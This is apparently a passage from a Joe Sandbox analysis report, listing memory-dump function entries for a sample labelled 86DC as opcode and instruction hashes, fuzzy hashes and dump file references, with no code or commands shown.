                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                                      • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                                      • Instruction ID: fe9ebc888ba6e418e57204f9307b514bdb7e66bbc3f3f42efcfbe0d6bc7ace3a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB81C236A04201DFD714DF28C8A0A6BB7F2EF99714F19956DE5858B3A1DB31E841CB82
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                                                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction ID: e576a6ccdf3ba229831cc15060c5c880bfa0516e0810a2fc047305db2ac0082d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F71D53AB083698BD754CE2CC48031FBBE2ABC5714F29852EE49497391D335DC46CB82
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: w
                                                                                                                                                                                                                                                                                      • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                      • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: w
                                                                                                                                                                                                                                                                                      • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                                      • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                                      • Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5c646b12e738336917274a545b2c61edbe108d06d4d748e9d6a03369be5bb1f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46C1F3B16083808BD718DF25C860AAFBBE6EFD2314F14492DE4D68B391DB75C50ACB56
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                                      • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                                      • Instruction ID: af11fe17978cd93e00e1220e05925effdca8ba8aa0c4a2109a86129c0322996f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B614C356083914FD726CF38C8505AF7BE16FD5210F48826EE8D447392D771D805D7A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                                                                      • Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9beccb418eb2a315fce9c1fee449ff7612de2d6f2e7ef11585c31999dd8e919
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
• Instruction ID: 02e7fdb9e997fee3c0903fee505586f18a05a41d6ef12aba8ac08767c9835319
• Opcode Fuzzy Hash: 896f3fb295f70a3d1d2d868c2c2a0e71ef34daf535ef3f76e5866041dfd6add5
• Instruction Fuzzy Hash: 7D6169B16003068FE729CF69D891296FBA1FF46300F1996ADC0998F752E378E5C1CB95
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
• Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction ID: c3d12b93d78f1f484f33c1668953f582193b3a136e2abd9ad7ab54a8518d6550
• Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
• Instruction Fuzzy Hash: C7415776E587148FC328EF64D8D067BB3A2EBDA318F1F853D89D61B354DAB05D018249
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
• Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction ID: 363616584490c8cfdd38b49435a33cb1a7e8db8c9d1d0bc801d3306b39b1d96a
• Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
• Instruction Fuzzy Hash: 3541C1A41083D18AD7368F2980607BBBFE1EFA325DF2849ADC2C5A7782D7754007CB59
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
• Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: d3e02ebb12a30214000f0bf390f3e698119c0436f3cb675a2d7e90ff4cbfe528
• Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction Fuzzy Hash: 6351567951C3408BD324CF24D890A6BB7F2EFD6304F18995CF88AAB3A5DB309906C746
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
• Instruction ID: a454da726d21e350cce640bbd329bca0362f14b9820f1970a6102d2b89da6c4e
• Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
• Instruction Fuzzy Hash: B54128B1A002418BD7268F39CC917B3B3E2EF92308F58456ED492CB7A1E779D441CB20
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
• Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                      • Instruction ID: 30144f66765361ae222b66f6d468ecc60824fbdaa5532ec34b9147dc76959ee0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B541C0A41083D18AD7668B3890617BBBFD0EB9321CF24599DC2D6A7382C7344007CB5A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                                      • Instruction ID: bbc0835a83765eef3cd74b7ceb7235963b1851d4d2b73f3e937bf7661a41b1de
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2416876A587148FC224EF54ACD067FB3A2EF96328F1F852DD5E51B390EBA09C009645
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                      • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                      • Instruction ID: bfa9a9c96b699f8e7a8cd82cce4b282524c487e2f69033ba1994abd8c055a1ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6317775A587148FC328EFA4E8D057BB3A1EB8B318F1F852D85E50B350E7B09D019649
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                                      • Instruction ID: f376a394c9daf494ef926e96f763dcf9c0e09d31fc5128e084986723f8e8bf14
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6141BFB66093908BC734CF24C85179FBAF6EBD1214F498E2CD4CAAB341E73589058B87
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                                      • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                                      • Instruction ID: 759eb49988ef9dc5662f2e4247f32ba859080cacb43d08644275f87d0e5ad490
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE212334704B019FD321CF28D880B67B7E3EBC6724F258A28D5958B799CB30E852CB14
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                                      • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
